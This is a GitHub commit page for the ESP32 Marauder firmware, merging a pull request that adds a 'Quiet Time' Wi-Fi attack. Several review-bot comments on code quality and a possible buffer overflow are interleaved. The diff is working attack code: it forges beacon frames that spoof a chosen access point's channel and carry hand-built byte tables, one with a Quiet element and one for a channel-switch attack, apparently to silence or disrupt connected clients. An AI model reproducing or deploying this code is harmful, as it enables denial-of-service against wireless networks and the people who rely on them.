
Commit 410cca6

Merge pull request #1134 from justcallmekoko/develop
Add quiet time attack
2 parents 65d1efa + da78493 commit 410cca6


3 files changed

+65
-24
lines changed

3 files changed

+65
-24
lines changed

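--- a/esp32_marauder/MenuFunctions.cpp
+++ b/esp32_marauder/MenuFunctions.cpp
@@ -167,6 +167,7 @@ void MenuFunctions::main(uint32_t currentTime)
 (wifi_scan_obj.currentScanMode != WIFI_ATTACK_BEACON_SPAM) &&
 (wifi_scan_obj.currentScanMode != WIFI_ATTACK_AP_SPAM) &&
 (wifi_scan_obj.currentScanMode != WIFI_ATTACK_CSA) &&
+(wifi_scan_obj.currentScanMode != WIFI_ATTACK_QUIET) &&
 (wifi_scan_obj.currentScanMode != WIFI_ATTACK_AUTH) &&
 (wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH) &&
 (wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH_MANUAL) &&
@@ -230,6 +231,7 @@ void MenuFunctions::main(uint32_t currentTime)
 (wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_SPAM) ||
 (wifi_scan_obj.currentScanMode == WIFI_ATTACK_AP_SPAM) ||
 (wifi_scan_obj.currentScanMode == WIFI_ATTACK_CSA) ||
+(wifi_scan_obj.currentScanMode == WIFI_ATTACK_QUIET) ||
 (wifi_scan_obj.currentScanMode == WIFI_ATTACK_AUTH) ||
 (wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH) ||
 (wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH_MANUAL) ||
@@ -333,6 +335,7 @@ void MenuFunctions::main(uint32_t currentTime)
 (wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_SPAM) ||
 (wifi_scan_obj.currentScanMode == WIFI_ATTACK_AP_SPAM) ||
 (wifi_scan_obj.currentScanMode == WIFI_ATTACK_CSA) ||
+(wifi_scan_obj.currentScanMode == WIFI_ATTACK_QUIET) ||
 (wifi_scan_obj.currentScanMode == WIFI_ATTACK_AUTH) ||
 (wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH) ||
 (wifi_scan_obj.currentScanMode == WIFI_ATTACK_DEAUTH_MANUAL) ||
@@ -400,6 +403,7 @@ void MenuFunctions::main(uint32_t currentTime)
 if ((wifi_scan_obj.currentScanMode != WIFI_ATTACK_BEACON_SPAM) &&
 (wifi_scan_obj.currentScanMode != WIFI_ATTACK_AP_SPAM) &&
 (wifi_scan_obj.currentScanMode != WIFI_ATTACK_CSA) &&
+(wifi_scan_obj.currentScanMode != WIFI_ATTACK_QUIET) &&
 (wifi_scan_obj.currentScanMode != WIFI_ATTACK_AUTH) &&
 (wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH) &&
 (wifi_scan_obj.currentScanMode != WIFI_ATTACK_DEAUTH_MANUAL) &&
@@ -1938,6 +1942,11 @@ void MenuFunctions::RunSetup()
 this->drawStatusBar();
 wifi_scan_obj.StartScan(WIFI_ATTACK_CSA, TFT_GREEN);
 });
+this->addNodes(&wifiAttackMenu, "Quiet Time", TFTRED, NULL, BEACON_LIST, [this]() {
+display_obj.clearScreen();
+this->drawStatusBar();
+wifi_scan_obj.StartScan(WIFI_ATTACK_QUIET, TFT_GREEN);
+});
 
 evilPortalMenu.parentMenu = &wifiAttackMenu;
 this->addNodes(&evilPortalMenu, text09, TFTLIGHTGREY, NULL, 0, [this]() {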
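Review bot: The `WIFI_ATTACK_QUIET` comparison is pasted into four hand-maintained copies of the same mode list in MenuFunctions::main (the hunks at 167, 230, 333 and 400), and every future mode has to be added to each of them or it silently lands in the wrong branch. A single predicate on WiFiScan that owns the list once, e.g. `bool isWiFiAttackMode() const;` returning the disjunction, called from all four conditions, would remove that hazard; the enclosing `if` statements begin and end outside the hunks, so the exact call sites are inferred. The new "Quiet Time" node in RunSetup also passes its label as a bare literal while the neighbouring node uses `text09` from the string table; if the menu strings are meant to be table-driven, the new label should follow suit.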

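--- a/esp32_marauder/WiFiScan.cpp
+++ b/esp32_marauder/WiFiScan.cpp
@@ -2136,6 +2136,8 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color) {
 this->startWiFiAttacks(scan_mode, color, text_table1[51]);
 else if (scan_mode == WIFI_ATTACK_CSA)
 this->startWiFiAttacks(scan_mode, color, "CSA Attack");
+else if (scan_mode == WIFI_ATTACK_QUIET)
+this->startWiFiAttacks(scan_mode, color, "Quiet Attack");
 else if (scan_mode == WIFI_ATTACK_RICK_ROLL)
 this->startWiFiAttacks(scan_mode, color, text_table1[52]);
 else if (scan_mode == WIFI_ATTACK_FUNNY_BEACON)
@@ -2443,6 +2445,7 @@ void WiFiScan::StopScan(uint8_t scan_mode)
 (currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
 (currentScanMode == WIFI_ATTACK_BEACON_SPAM) ||
 (currentScanMode == WIFI_ATTACK_CSA) ||
+(currentScanMode == WIFI_ATTACK_QUIET) ||
 (currentScanMode == WIFI_ATTACK_AUTH) ||
 (currentScanMode == WIFI_ATTACK_DEAUTH) ||
 (currentScanMode == WIFI_ATTACK_DEAUTH_MANUAL) ||
@@ -8802,15 +8805,15 @@ void WiFiScan::beaconListSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t
 }
 }
 
-void WiFiScan::broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid, bool csa) {
+void WiFiScan::broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid, int scan_mode) {
 int post_ssid_len = 12;
 
 #ifndef HAS_DUAL_BAND
 set_channel = random(1,15);
 #else
 set_channel = dual_band_channels[random(0, DUAL_BAND_CHANNELS)];
 #endif
-if (csa) {
+if (scan_mode == WIFI_ATTACK_CSA) {
 post_ssid_len = 18;
 while (set_channel == custom_ssid.channel) {
 #ifndef HAS_DUAL_BAND
@@ -8819,17 +8822,15 @@ void WiFiScan::broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_s
 set_channel = dual_band_channels[random(0, DUAL_BAND_CHANNELS)];
 #endif
 }
+} else if (scan_mode == WIFI_ATTACK_QUIET) {
+post_ssid_len = 44;
+set_channel = custom_ssid.channel;
 }
 this->changeChannel(this->set_channel);
 delay(1);
 
-//if (custom_ssid.beacon->size() == 0)
-// return;
-
-
-// Randomize SRC MAC
-// Randomize SRC MAC
-if (!csa) {
+if ((scan_mode != WIFI_ATTACK_CSA) &&
+(scan_mode != WIFI_ATTACK_QUIET)) {
 packet[10] = packet[16] = random(256);
 packet[11] = packet[17] = random(256);
 packet[12] = packet[18] = random(256);
@@ -8850,7 +8851,8 @@ void WiFiScan::broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_s
 
 int realLen = strlen(ESSID);
 int ssidLen = realLen;
-if (!csa)
+if ((scan_mode != WIFI_ATTACK_CSA) &&
+(scan_mode != WIFI_ATTACK_QUIET))
 ssidLen = random(realLen, 33);
 
 int numSpace = ssidLen - realLen;
@@ -8860,27 +8862,55 @@ void WiFiScan::broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_s
 for(int i = 0; i < realLen; i++)
 packet[38 + i] = ESSID[i];
 
-if (!csa) {
+if ((scan_mode != WIFI_ATTACK_CSA) &&
+(scan_mode != WIFI_ATTACK_QUIET)) {
 for(int i = 0; i < numSpace; i++)
 packet[38 + realLen + i] = 0x20;
 
 packet[50 + fullLen] = set_channel;
 }
-
 
-if (!csa) {
-uint8_t postSSID[13] = {0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c, //supported rate
-0x03, 0x01, 0x04 /*DSSS (Current Channel)*/ };
+const uint8_t* post = nullptr;
+int post_len = 0;
 
-for(int i = 0; i < post_ssid_len; i++)
-packet[38 + fullLen + i] = postSSID[i];
+static const uint8_t post_base[] = {
+0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c,
+0x03, 0x01, 0x04
+};
+
+static const uint8_t post_csa[] = {
+0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c,
+0x03, 0x01, 0x00,
+0x25, 0x03, 0x01, 0x00, 0x03
+};
+
+static const uint8_t post_quiet[] = {
+0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c,
+0x03, 0x01, 0x00, 0x07, 0x06, 0x55, 0x53, 0x20,
+0x64, 0x0b, 0x14, 0x20, 0x01, 0x00, 0x05, 0x04, 0x00, 0x01,
+0x00, 0x00, 0x32, 0x04, 0x0c, 0x12, 0x18, 0x60, 0x28, 0x06,
+0x01, 0x05, 0xff, 0xff, 0x00, 0x64
+};
+
+uint8_t temp[64]; // big enough for worst case
+if (scan_mode == WIFI_ATTACK_CSA) {
+memcpy(temp, post_csa, sizeof(post_csa));
+temp[12] = custom_ssid.channel;
+temp[16] = set_channel;
+post = temp;
+post_len = sizeof(post_csa);
+} else if (scan_mode == WIFI_ATTACK_QUIET) {
+memcpy(temp, post_quiet, sizeof(post_quiet));
+temp[12] = custom_ssid.channel;
+post = temp;
+post_len = sizeof(post_quiet);
 } else {
-uint8_t postSSID[18] = {0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c, //supported rate
-0x03, 0x01, custom_ssid.channel, 0x25, 0x03, 0x01, set_channel, 0x03 };
-for(int i = 0; i < post_ssid_len; i++)
-packet[38 + fullLen + i] = postSSID[i];
+post = post_base;
+post_len = sizeof(post_base);
 }
 
+memcpy(packet + (38 + fullLen), post, post_len);
+
 packet[34] = custom_ssid.beacon[0];
 packet[35] = custom_ssid.beacon[1];
 
@@ -12006,10 +12036,11 @@ void WiFiScan::main(uint32_t currentTime)
 }
 }
 else if ((currentScanMode == WIFI_ATTACK_AP_SPAM) ||
-(currentScanMode == WIFI_ATTACK_CSA)) {
+(currentScanMode == WIFI_ATTACK_CSA) ||
+(currentScanMode == WIFI_ATTACK_QUIET)) {
 for (int i = 0; i < access_points->size(); i++) {
 if (access_points->get(i).selected)
-this->broadcastCustomBeacon(currentTime, access_points->get(i), currentScanMode == WIFI_ATTACK_CSA);
+this->broadcastCustomBeacon(currentTime, access_points->get(i), currentScanMode);
 }
 
 if (currentTime - initTime >= 1000) {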
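Review bot: `memcpy(packet + (38 + fullLen), post, post_len)` in broadcastCustomBeacon now writes up to `sizeof(post_quiet)` (44) bytes at an offset that depends on `fullLen`, with no check against the capacity of `packet`; both `packet` and `fullLen` are defined outside the hunk, and the removed per-byte loop had the same exposure, but the quiet table more than doubles the largest write. If `packet` is a fixed-size array, a guard before the copy such as `if (38 + fullLen + post_len > (int)sizeof(packet)) return;` keeps a long SSID from corrupting adjacent memory on the device, and `static_assert(sizeof(post_quiet) <= sizeof(temp), "temp too small");` states the invariant that the `// big enough for worst case` comment only asserts. `post_ssid_len` is still assigned (12, 18 or 44) but nothing in the new visible code reads it now that the loops using it are gone; unless the part of the function after the hunk uses it, it should be removed. The new tables also lost the per-element labels the old initializers carried (`//supported rate`, `/*DSSS (Current Channel)*/`), so a short comment naming each information element in `post_base`, `post_csa` and `post_quiet` would keep the byte layout readable, especially since `temp[12]` and `temp[16]` patch positions by number.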

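--- a/esp32_marauder/WiFiScan.h
+++ b/esp32_marauder/WiFiScan.h
@@ -153,6 +153,7 @@
 #define WIFI_SCAN_SAE_COMMIT 77
 #define WIFI_ATTACK_SAE_COMMIT 78
 #define WIFI_ATTACK_CSA 79
+#define WIFI_ATTACK_QUIET 80
 
 #define WIFI_ATTACK_FUNNY_BEACON 99
 
@@ -619,7 +620,7 @@ class WiFiScan
 //void sendAssociationSleep(const char* ESSID, uint8_t bssid[6], int channel, String dst_mac_str = "ff:ff:ff:ff:ff:ff");
 void broadcastRandomSSID(uint32_t currentTime);
 void broadcastCustomBeacon(uint32_t current_time, ssid custom_ssid);
-void broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid, bool csa = false);
+void broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid, int scan_mode);
 void broadcastSetSSID(uint32_t current_time, const char* ESSID);
 void RunAPScan(uint8_t scan_mode, uint16_t color);
 void RunGPSNmea();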
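Review bot: The new `int scan_mode` parameter on broadcastCustomBeacon uses a different type from the one the class already uses for the same value — StartScan, StopScan and RunAPScan all take `uint8_t scan_mode`, and the WIFI_ATTACK_* defines fit in a byte — so the declaration is inconsistent with its neighbours; `void broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid, uint8_t scan_mode);` would match. Dropping the `= false` default also retires the two-argument form of the AccessPoint overload, which is fine if WiFiScan::main was its only caller, but that cannot be confirmed from this page.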
